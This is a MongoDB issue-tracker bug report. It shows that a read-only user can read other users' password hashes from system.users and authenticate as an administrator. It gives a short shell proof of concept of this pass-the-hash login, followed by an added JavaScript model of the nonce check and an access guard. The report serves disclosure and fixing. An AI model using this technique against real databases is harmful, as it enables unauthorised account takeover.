Details
- Bug
- Resolution: Duplicate
- Critical - P2
- all
- ALL
Description
A read-only user can get write priority by accessing other users' pwd hash.
sample:
> db.system.users.find()
> db.$cmd.findOne({getnonce:1})
{ "nonce" : "9892be9572e9851e", "ok" : 1 }
> db.runCommand({ authenticate : 1, user : "sa", nonce : "9892be9572e9851e", key : hex_md5("9892be9572e9851e"+"sa"+"84c689ded211fb631fd5f5dedc5d4539") })
{ "ok" : 1 }
Attachments
Issue Links
- is related to SERVER-4692 Read-only users should be denied access to system.users collection (Closed)
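Why the stored hash has to be protected like a password, as an added example (not part of the original report and not MongoDB's own code): it models the nonce check from the sample, where the key is built from the stored pwd value alone, together with the access rule that SERVER-4692 asks for. The function names, the session object, the sample password and the sample nonce are constructed for illustration.

```javascript
// Added illustration: model of the nonce-based check shown in the report.
const { createHash, timingSafeEqual } = require("crypto");

const hex_md5 = (s) => createHash("md5").update(s, "utf8").digest("hex");

// Legacy stored credential in system.users: pwd = md5(user + ":mongo:" + password)
function storedPwdHash(user, password) {
  return hex_md5(user + ":mongo:" + password);
}

// Proof as built in the report's sample: key = md5(nonce + user + pwd)
function proofFromHash(nonce, user, pwdHash) {
  return hex_md5(nonce + user + pwdHash);
}

// Server-side check (model): recompute from the stored document and compare
// in constant time. The clear-text password is never an input here.
function verify(userDoc, nonce, key) {
  const expected = Buffer.from(proofFromHash(nonce, userDoc.user, userDoc.pwd), "hex");
  const given = Buffer.from(String(key), "hex");
  return expected.length === given.length && timingSafeEqual(expected, given);
}

// Hypothetical authorization guard modelling the rule in SERVER-4692:
// a read-only session may read data, but never the credential collection.
function canRead(session, collection) {
  if (collection === "system.users") return session.readOnly !== true;
  return true;
}

// Constructed sample data (not taken from the report).
const SAMPLE_USER = { user: "sa", pwd: storedPwdHash("sa", "constructed-password") };
const SAMPLE_NONCE = "0123456789abcdef";

function demo() {
  const fromPassword = proofFromHash(
    SAMPLE_NONCE, "sa", storedPwdHash("sa", "constructed-password"));
  const fromStoredHashOnly = proofFromHash(SAMPLE_NONCE, SAMPLE_USER.user, SAMPLE_USER.pwd);
  return {
    sameProof: fromPassword === fromStoredHashOnly,
    hashAloneAuthenticates: verify(SAMPLE_USER, SAMPLE_NONCE, fromStoredHashOnly),
    wrongKeyRejected: !verify(SAMPLE_USER, SAMPLE_NONCE, hex_md5("wrong")),
    readOnlyCanReadUsers: canRead({ user: "ro", readOnly: true }, "system.users"),
    readOnlyCanReadData: canRead({ user: "ro", readOnly: true }, "items"),
  };
}

console.log(demo());
```

Because the proof depends only on the stored value, the hash is password-equivalent, and the guard on system.users is the control that keeps it out of a read-only user's reach.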